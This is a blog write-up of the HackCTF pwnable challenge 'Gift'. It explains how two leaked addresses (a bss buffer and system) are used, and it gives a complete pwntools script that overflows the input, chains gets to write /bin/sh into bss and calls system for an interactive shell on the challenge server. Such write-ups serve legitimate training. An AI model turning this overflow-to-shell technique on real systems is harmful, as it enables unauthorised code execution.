[HackCTF : Pwnable] Gift(250p)
Wargame/HackCTF 2021. 11. 26. 17:40
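gift checksec, yikes
It prints two addresses and then echoes back whatever it receives as input.
main: the two addresses are binsh and system.
binsh is not a /bin/sh string; it is a location in the bss section. Write /bin/sh there.
system is the address of system.
Use gets to write the /bin/sh string into bss, then call system(bss).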
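```python
from pwn import *

# p = process("./gift")
p = remote("ctf.j0n9hyun.xyz", 3018)
e = ELF("./gift")
gets = e.plt['gets']
pr = 0x0804866b            # return address for gets; skips its one argument
binsh = b"/bin/sh\x00"

# The binary prints two addresses: the bss buffer and system
p.recvuntil(b"Hey guyssssssssss here you are: ")
bss = int(p.recv(10), 16)
system = int(p.recv(10), 16)
log.success(hex(bss))
log.success(hex(system))

payload = b"A" * 136       # padding up to the saved return address
payload += p32(gets)       # gets(bss): read "/bin/sh" into bss
payload += p32(pr)
payload += p32(bss)
payload += p32(system)     # system(bss)
payload += b"AAAA"         # dummy return address for system
payload += p32(bss)

p.sendline(b"AAAA")        # first input, echoed back by the binary
p.sendline(payload)        # second input overwrites the return address
p.sendline(binsh)          # consumed by the gets call in the chain
p.interactive()
```
ex.py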